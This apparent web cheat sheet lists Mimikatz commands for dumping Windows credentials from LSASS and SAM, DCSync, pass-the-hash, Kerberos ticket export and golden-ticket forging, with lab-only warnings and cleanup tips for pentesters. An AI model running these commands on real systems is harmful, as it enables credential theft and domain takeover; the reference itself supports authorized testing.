CyberCheatsheets

Mimikatz Cheat Sheet

Windows credential extraction and Kerberos manipulation (lab-only).

Active Directory & WindowscredentialsdcsynclsasssekurlsawindowsUpdated 2026-06-02

Overview

Mimikatz extracts passwords, NTLM hashes, Kerberos tickets, and PINs from Windows memory and performs advanced attacks (Pass-the-Hash, Pass-the-Ticket, DCSync, golden ticket primitives). It is indiscriminate malware-class tooling from a defender’s perspective.

AUTHORIZED LAB / PENTEST ONLY: Use only on:

- Machines you own (personal lab VMs)

- Isolated cyber ranges (HTB, PG, VulnLab, etc.)

- Client environments with explicit written rules of engagement allowing credential access

Never run Mimikatz on employer systems, school networks, friends’ PCs, or production without signed scope. Unauthorized credential theft violates computer fraud laws worldwide. Most EDR will quarantine it instantly.

Install

Run as HIGH integrity / Administrator

mimikatz.exe

Essential commands

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # token::elevate

Common workflows

Logon passwords from LSASS (requires admin + SeDebugPrivilege) —

privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::msv

SAM / LSA secrets (local) —

lsadump::sam
lsadump::secrets

DCSync (domain admin — devastating) —

lsadump::dcsync /domain:corp.local /user:Administrator
lsadump::dcsync /domain:corp.local /all /csv

Pass-the-hash / Pass-the-ticket —

sekurlsa::pth /user:administrator /domain:corp.local /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:cmd.exe
kerberos::ptt <ticket.kirbi>
misc::cmd

Kerberos ticket export —

sekurlsa::tickets /export
kerberos::list /export

Vault / DPAPI (context-dependent) —

vault::list
dpapi::masterkey /in:...

Flags reference

privilege::debug

Enable debug privilege

sekurlsa::logonpasswords

Cleartext/hashes from LSASS

lsadump::dcsync

Replicate DC secrets

sekurlsa::pth

Pass-the-hash

kerberos::golden

Forge TGT

crypto::certificates

Certificate store

Tips

  • Ethics (mandatory): treat every Mimikatz run as a full domain compromise event; document in report, rotate creds after test, and never exfiltrate real user passwords outside scope.
  • Modern Windows + Credential Guard + PPL block naive LSASS reads—labs teach bypasses; do not use bypasses on unauthorized systems.
  • Prefer built-in assessment alternatives when allowed: impacket-secretsdump, rubeus, lsassy module—still sensitive, often better logged/controlled.
  • Delete dumps and *.kirbi files after lab; never commit secrets to git.
  • For learning, use dedicated vulnerable AD labs (e.g., GOAD, vuln AD ranges) with snapshots.

References

Related cheat sheets